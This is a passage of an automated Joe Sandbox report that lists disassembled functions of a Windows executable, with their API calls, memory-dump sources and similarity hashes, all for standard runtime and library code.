                                                                                                • Part of subcall function 00E80678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
                                                                                                • Part of subcall function 00E80678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
                                                                                                • Part of subcall function 00E80678: IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
                                                                                                • Part of subcall function 00E80678: TranslateMessage.USER32(?), ref: 00E806BC
                                                                                                • Part of subcall function 00E80678: DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: d8f83d761b3b0a51720e0ee59a724cd1f0a8b8b123f8fc25faa00ffc743b80bb
                                                                                              • Instruction ID: 2c88159e303aa3c1e9f9be0b463ee84b2f62bb99343bf14c9c9f9bbed65a0fcb
                                                                                              • Opcode Fuzzy Hash: d8f83d761b3b0a51720e0ee59a724cd1f0a8b8b123f8fc25faa00ffc743b80bb
                                                                                              • Instruction Fuzzy Hash: 5AD09E32144200AED6523B52DE06F0A7AE2AB88B04F004655B349344B1C6629E34AB12
                                                                                              Function 00E84D2C Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E84DD5: RtlAcquireSRWLockExclusive.NTDLL ref: 00E84DF2
                                                                                              • DloadProtectSection.DELAYIMP ref: 00E84D54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 3680172570-0
                                                                                              • Opcode ID: 38977446e5eb24aba668435e13c772502de584bd3a984eb466a14326ec3162f9
                                                                                              • Instruction ID: b2dd695d145884203554497a8360c67d060a156532c76119ba75e213fc3d5347
                                                                                              • Opcode Fuzzy Hash: 38977446e5eb24aba668435e13c772502de584bd3a984eb466a14326ec3162f9
                                                                                              • Instruction Fuzzy Hash: E8D0C9B62406629EC613BB669C4A7566290F34430CB952B46E25DB61E4CB6444549701
                                                                                              Function 00E68180 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E68187
                                                                                                • Part of subcall function 00E74F2B: __EH_prolog3.LIBCMT ref: 00E74F32
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 13ee96b44cccd51dce69e90cc2396c5679ac1f8e010f29b13bce1171d4543b79
                                                                                              • Instruction ID: 4434e2f8747ccb1393ba4da9fa5db0fb38b2f15171b14e4bbe490ee1feea284d
                                                                                              • Opcode Fuzzy Hash: 13ee96b44cccd51dce69e90cc2396c5679ac1f8e010f29b13bce1171d4543b79
                                                                                              • Instruction Fuzzy Hash: 73C012F2B5092483DF067F54940375C11905B44B02F40A14DF1087B283CF790A0183CA
                                                                                              Function 00E6E152 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00E6E052,?,?,?,00000000,00E6E5D2,?,?,00000000,?,00000000), ref: 00E6E15E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: e5b3a5862e2136380ebc2c1c43ec4f051d4b4f1bafe789a688d4f769d75529ae
                                                                                              • Instruction ID: d775cedd22e2554b9f91575b78b4fef729b70cf8d63c140d563085f6d81c4dc6
                                                                                              • Opcode Fuzzy Hash: e5b3a5862e2136380ebc2c1c43ec4f051d4b4f1bafe789a688d4f769d75529ae
                                                                                              • Instruction Fuzzy Hash: 3AC01238041105C68E200624AC4405973119A533E97B4A395C028A52E2C3328C87F600
                                                                                              Function 00E84B8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 28b4959d3cc6b8175f25f3a467e54f8c6e3eab2f3121209fe02690425a4891e0
                                                                                              • Instruction ID: 2b98d9b7390d0e5b681cdcb782e95a44e83819685292c2e432f09dade41e27d7
                                                                                              • Opcode Fuzzy Hash: 28b4959d3cc6b8175f25f3a467e54f8c6e3eab2f3121209fe02690425a4891e0
                                                                                              • Instruction Fuzzy Hash: C9B012D235C212EC3104B1491D03E77018CC0C5B10330B11FF44CF51D1D440AC801231
                                                                                              Function 00E84B62 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5384a7f3145eb1f7b2fa1691f403b0499d2fab93041f9fef7409c0ba9033b956
                                                                                              • Instruction ID: df3747515ce07ea5796764fd72bb87212843763e056d5ed4a8d230039f60cd09
                                                                                              • Opcode Fuzzy Hash: 5384a7f3145eb1f7b2fa1691f403b0499d2fab93041f9fef7409c0ba9033b956
                                                                                              • Instruction Fuzzy Hash: FBB012D235C112AC3104B1095E03E77118CC1C5B10330B31FF24CF50D1D4405C810231
                                                                                              Function 00E84B58 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c28bb74d83c3bf0453d5eaca576348dc08ef9b2470db45e35b01d8c1f3e4dffa
                                                                                              • Instruction ID: 42de81f4a3266069e3663a8939bf9ca905fd0d547bb6f66474e079d44e31ebbf
                                                                                              • Opcode Fuzzy Hash: c28bb74d83c3bf0453d5eaca576348dc08ef9b2470db45e35b01d8c1f3e4dffa
                                                                                              • Instruction Fuzzy Hash: 5FB012D235C212AC3204B1095D03E77018CC0C5B10330731FF14CF50D1D4405CC40231
                                                                                              Function 00E84CAD Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: cf0637990a2195839dafebd726ee6e2cb2d13a0279f1f1ec5556808dad935037
                                                                                              • Instruction ID: 0c847cbd74264c7107cf70ab9213c079e18996f6bd16b47dd70313bf3dc004b9
                                                                                              • Opcode Fuzzy Hash: cf0637990a2195839dafebd726ee6e2cb2d13a0279f1f1ec5556808dad935037
                                                                                              • Instruction Fuzzy Hash: 9DB012D235D112AC3204B1191E03D77014CC1C5B10332B12FF18CF54C1D4401C450231
                                                                                              Function 00E84CB7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: c5975fe83ebc523f7c090d0385510b36e0568729d2247069564f1a907efc8808
                                                                                              • Instruction ID: eb4afe0f21f9dd1253b406d4911637f20b36c99c88dcd5691e2aab367812c8ee
                                                                                              • Opcode Fuzzy Hash: c5975fe83ebc523f7c090d0385510b36e0568729d2247069564f1a907efc8808
                                                                                              • Instruction Fuzzy Hash: B8B012D235D113AC3204B1191D03E77014CC0C5B10332712FF08CF58C1D4401C440231
                                                                                              Function 00E84C99 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 23abf720c903b695e480aa29f4d76f5bcc7bc9f3867e2de119a91e1aa749503c
                                                                                              • Instruction ID: 44aac8c10130321eed95e1928643a63c930f4fa9ff4f5532e0e1775b8fc9d469
                                                                                              • Opcode Fuzzy Hash: 23abf720c903b695e480aa29f4d76f5bcc7bc9f3867e2de119a91e1aa749503c
                                                                                              • Instruction Fuzzy Hash: 6DB012D235D112EC3204B1291D03D77014CC0C5B10332B12FF48CF54C1D4401C440231
                                                                                              Function 00E84C7E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84C90
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: a3677c1afc9a1e81bc02daa16fe75248613847d67ac80be132a586bdf9fc609e
                                                                                              • Instruction ID: 0f526e82e43a295a07567c7177db240a081406f6fab36e34f11e017c2d92ae9b
                                                                                              • Opcode Fuzzy Hash: a3677c1afc9a1e81bc02daa16fe75248613847d67ac80be132a586bdf9fc609e
                                                                                              • Instruction Fuzzy Hash: D7B012C639D112BC320471051F03C77010CC9D1B11332B21FF1CCF44C294401C410131
                                                                                              Function 00E84D22 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 91136286cb4673eb5af1e6b45f149c4a243f74cfb6c86e82de8fd43e79c18ce1
                                                                                              • Instruction ID: 6d2ddf604f7962b1dcb1d8931ef73803c571ba99a850ac0287bd1f150970cef7
                                                                                              • Opcode Fuzzy Hash: 91136286cb4673eb5af1e6b45f149c4a243f74cfb6c86e82de8fd43e79c18ce1
                                                                                              • Instruction Fuzzy Hash: 2FB012D635E5136C3144B1485D03D77014CD1C5B10330712EF04CF54C1D4401C460231
                                                                                              Function 00E84D04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5616b80d91fb4e11c7f9cc7ed070f28280ba2e7956c476cf6597a42813bb2f92
                                                                                              • Instruction ID: 6d545ab332fb748e11daea439d07d96ac38392f64522b2222d1202b24ea852e9
                                                                                              • Opcode Fuzzy Hash: 5616b80d91fb4e11c7f9cc7ed070f28280ba2e7956c476cf6597a42813bb2f92
                                                                                              • Instruction Fuzzy Hash: 79B012D635E6136C3284B1485D03D77054CC1C5B10330722EF04CF50C1D4411C860231
                                                                                              Function 00E84D18 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84CF1
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7386fe3857b5f4d82024036f46be89b1307e8280aa0989768691330c37717db9
                                                                                              • Instruction ID: ee1ba502f3c617ec1d9abe8565d39391265ca76368e6f592615996cef07d5838
                                                                                              • Opcode Fuzzy Hash: 7386fe3857b5f4d82024036f46be89b1307e8280aa0989768691330c37717db9
                                                                                              • Instruction Fuzzy Hash: 5BB012C635E5137C3144B1485D03D77014CC1C6B10330B15EF44CF60C1D4401C480231
                                                                                              Function 00E72226 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00E72233
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: c0d797c189201975e2588a97136e25256407a4bb38debc2d9615da721c00961f
                                                                                              • Instruction ID: a9aed80bd8948fa75a6d3d9395c9fb88767e224f3c3cd202c7e92517b68e7eb8
                                                                                              • Opcode Fuzzy Hash: c0d797c189201975e2588a97136e25256407a4bb38debc2d9615da721c00961f
                                                                                              • Instruction Fuzzy Hash: FAC04870201200DF8704DFA9DA8CA0A77AABFA2706B91D46AF544DB032C734DC64DA25
                                                                                              Function 00E84B85 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84B3B
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
